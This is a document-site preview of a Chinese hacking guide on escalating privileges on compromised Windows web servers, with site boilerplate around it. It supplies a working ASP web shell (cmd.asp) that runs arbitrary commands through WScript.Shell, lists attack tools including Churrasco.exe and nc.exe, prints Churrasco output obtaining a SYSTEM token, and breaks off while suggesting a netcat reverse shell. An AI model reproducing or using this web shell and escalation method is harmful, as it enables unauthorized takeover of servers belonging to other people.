利用SHIFT后门拿服务器方法.docx

  1. 1、本文档共4页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
WT技术 第PAGE \* MERGEFORMAT4页 利 用 SHIft 后 门 拿 只有想不到的 服 务 没有做不到的 器 方 法   那么在这里我写点自己提权时所用到几个小方法!也是自己实战得来的经验!   方法如有不对的请大家多多指点!   提权时要到的工具如下:cmd.exe Churrasco.exe nc.exe   以上就是今天主要讲的!东西是死的!人是活的!就看你怎么用了!   用以上工具先要确定SHELL里 wscript.shell 命令行执行组件是否可用!如不能用用以下方法进行调用!如调用也不行!那么就请你另想办法!   代码如下 : object runat=server id=oScriptlhn scope=page classid=clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8/object %if err then% object runat=server id=oScriptlhn scope=page classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B/object % end if % form method=post input type=text name=cmdx size=60 value=C:\RECYCLER\cmd.exebr input type=text name=cmd size=60br input type=submit value=net user/form textarea readonly cols=80 rows=20 %On Error Resume Next if request(cmdx)=C:\RECYCLER\cmd.exe then response.write oScriptlhn.exec(cmd.exe /crequest(cmd)).stdout.readall end if response.write oScriptlhn.exec(request(cmdx) /crequest(cmd)).stdout.readall % /textarea   将以上代码保存为cmd.asp上传到SHELL里 再访问这个CMD.asp如没有出错等就说明可以执行CMD命令!   下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现 /churrasco/--Current User: NETWORK SERVICE /churrasco/--Getting Rpcss PID ... /churrasco/--Found Rpcss PID: 696 /churrasco/--Searching for Rpcss threads ... /churrasco/--Found Thread: 444 /churrasco/--Thread not impersonating, looking for another thread... /churrasco/--Found Thread: 700 /churrasco/--Thread not impersonating, looking for another thread... /churrasco/--Found Thread: 704 /churrasco/--Thread not impersonating, looking for another thread... /churrasco/--Found Thread: 712 /churrasco/--Thread impersonating, got NETWORK SERVICE Token: 0xf24 /churrasco/--Getting SYSTEM token from Rpcss Service... /churrasco/--Found szywjs Token /churrasco/--Found SYSTEM token 0xf1c /churrasco/--Running command with SYSTEM Token...   直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的

文档评论(0)

ktj823 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档